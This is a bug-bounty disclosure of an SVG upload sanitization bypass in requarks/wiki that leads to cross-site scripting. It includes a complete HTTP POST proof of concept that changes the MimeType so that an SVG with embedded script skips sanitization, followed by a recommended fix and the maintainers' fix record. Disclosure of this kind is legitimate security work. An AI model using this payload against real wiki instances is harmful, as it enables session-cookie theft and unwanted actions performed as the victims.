Cross-site Scripting (XSS) - Reflected in requarks/wiki

Valid

Reported on

Dec 20th 2021


Description

SVG sanitization is incomplete. Attackers can bypass fix in https://github.com/Requarks/wiki/security/advisories/GHSA-3qv4-gp35-rgh7 to perform XSS via malicious SVG files.

Proof of Concept

The fix commit sanitizes SVG if MimeType = svg+xml. Unfortunately this can be controlled by user through the POST request, and so an attacker can modify the MimeType (from image/svg+xml to image/xxx) to bypass the sanitization check.

POST /u HTTP/1.1
Host: 10.0.2.4:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.2.4:3000/e/en/home
Content-Type: multipart/form-data; boundary=---------------------------51434357737717624032908586947
Content-Length: 729
Origin: http://10.0.2.4:3000
Connection: close
Cookie: jwt=eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwiZW1haWwiOiJhZG1pbkBhZG1pbi5sb2NhbCIsIm5hbWUiOiJBZG1pbmlzdHJhdG9yIiwiYXYiOm51bGwsInR6IjoiQW1lcmljYS9OZXdfWW9yayIsImxjIjoiZW4iLCJkZiI6IiIsImFwIjoiIiwicGVybWlzc2lvbnMiOlsibWFuYWdlOnN5c3RlbSJdLCJncm91cHMiOlsxXSwiaWF0IjoxNjM5Njc3NTkxLCJleHAiOjE2Mzk2NzkzOTEsImF1ZCI6InVybjp3aWtpLmpzIiwiaXNzIjoidXJuOndpa2kuanMifQ.lhEkYJre3SyUa00LACOrLKGgPDJdCol2gs9lI0IPr0VSAaS1x5jIsbhe4DOBeloQDKz2fcJtM8et_FnuKsbW-zKm8BOuE2B0WaAg-fDZ_bAJLAh3qpaYSjO-sYqcgyA6VPLWz595r3ogI_3t7AfjGDaUXpJrheOeN1BE3DQdGDl4SPVV5QbPtl5lm0EDzCdMDNVvr_Ur6MFiE8bhcmf1n8Hyk37FImbVY57Rn503at-XEl--lSqCRT-6KbWAGZ3XWPymoZPRuzTOnVMWw5cnoIoKIpJLnZz3kSsZA0TPsl5SiM6vU5bizPXkSzO8RfxghZoHMvNerBvbyFFKPOhecQ

-----------------------------51434357737717624032908586947

Content-Disposition: form-data; name="mediaUpload"
{"folderId":0}

-----------------------------51434357737717624032908586947

Content-Disposition: form-data; name="mediaUpload"; filename="pwned.svg"
Content-Type: image/svg

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert('SVG PoC');
   </script>
</svg>
-----------------------------51434357737717624032908586947--

Impact

This vulnerability is capable of stealing users cookie and performing unwanted actions on the site via XSS.

Recommended Fix

MimeType should be validated on server side.

We are processing your report and will contact the requarks/wiki team within 24 hours. a year ago
haxatron modified the report
a year ago
haxatron modified the report
a year ago
Nicolas Giard validated this vulnerability a year ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
Nicolas Giard marked this as fixed in 2.5.264 with commit 57b56d a year ago
Nicolas Giard has been awarded the fix bounty
This vulnerability will not receive a CVE
assets.js#L102L103 has been validated
to join this conversation